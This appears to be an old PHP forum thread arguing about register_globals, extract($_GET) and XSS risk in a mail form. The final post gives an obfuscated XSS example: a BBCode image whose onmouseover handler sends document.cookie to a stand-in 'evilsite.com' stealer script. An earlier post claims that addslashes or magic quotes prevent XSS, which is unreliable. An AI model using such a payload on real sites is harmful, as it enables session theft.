whats my form action?

[Jxhn]

Jxhn, are you a complete noob that wants to act as if you know what you're talking about, because that's what it seems like. Firstly by making a page called file.php with the following code

PHP Code:

<?php echo $lol; ?>

and then going to the url file.php?lol=John it will not output "John" it will output nothing! because $lol isn't assigned to any variable. You can get it like that though by using extract($_GET); such example is like

PHP Code:

<?php
extract($_GET); 
echo $lol; ?>

but other than that, your comment makes you look like an idiot. Secondly I said nothing about XSS or SQL Injections, I was simply only using what the guy who posted used and the negatives of using it. Thirdly XSS attacks can be dangerous, by using it they could add javascript in which could result in a hijack of their session etc. just have a look at a XSS example by wikipedia.
Yeah, no real XSS danger there!

Excellent2 - That's only a snippet of the original code but that's the general idea it was mainly from Dilore though.

Seriously Jxhn if you're going to make claims at least have the knowledge to back it up.

No, I know what I'm talking about, because it's only very simple php. Which is why I don't reply to a lot of other topics.

Try the file yourself before having a fit at me. How do you think variable poisoning works? It's because variables don't have to be declared.
http://johnphptest.freehostia.com/loljohn.php?lol=John

And as for the XSS I wasn't talking to you specifically about that, but there s no danger, because it's being sent to an email. So unless the email site is vulnerable to XSS then there is no vulnerability. And if it was then attackers could send emails themselves without his form, provided they knew the adress.

[Iszak]

FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.

oh what's that on the first line?

1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.

WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.

[Tylenol]

Iszak usualy knows what he is talking about, he's done many scripts for me that work fine.

[Calon]

FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

oh what's that on the first line?

WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.

I agree that he's making himself look like a bigger noob than he already is.

[Jxhn]

FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

oh what's that on the first line?

WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.

Well, sorry. I'd always thought they didn't need to be declared. It's something to do with the php settings about register globals I think. You must have been right.

I still don't agree on the XSS side though. All of those sorts of things have been patched by browsers for years, and why would the link have to have been sent through email? If they were easily possible then the link I sent you back there could have done it to you. I don't consider what you described to be XSS. XSS is not prevented by magicquotes or addslashes btw.

The reason I don't have my own host is because I don't have any websites and I'm not gonna buy one just to mess about.

I think you need to grow up a little though, calling someone a noob when they oppose you, even if they're wrong will just make you look immature. It's like when someone calls a chav gay (no offence to homosexuals (or chavs)). Like many others in the coding community here I think you just need to calm down a bit. If I said "I think I know little more about XSS and SQL injections than you", you'd think I was being cocky.

[Iszak]

Firstly you're right the link you sent could easily have done it. Secondly that example is from wikipedia, now yes anyone can edit wikipedia but it's likely to be correct as it's moderated. Thirdly XSS can be prevented via addslashes or magicquotes, for example by using addslashes you may prevent people insert javascript, This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you although I would question it somewhat. I'm not into XSS and SQL Injections massively - more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information in which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me - but then again you have no reason to believe me.

[Jxhn]

Firstly you're right the link you sent could easily have done it. Secondly that example is from wikipedia, now yes anyone can edit wikipedia but it's likely to be correct as it's moderated. Thirdly XSS can be prevented via addslashes or magicquotes, for example by using addslashes you may prevent people insert javascript, This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you although I would question it somewhat. I'm not into XSS and SQL Injections massively - more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information in which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me - but then again you have no reason to believe me.

Thanks for the recognition.

Btw example of XSS without quotes:

Code:

[image]http://somesite.com/transparentimage.gif  height=100 width=100% onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,115,105,116,101,46,99,111,109,47,115,116,101,97,108,101,114,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie       style=position:absolute;left:0px;top:0px   [/image]

This thread has got quite off topic, so this will probably be my last post in it.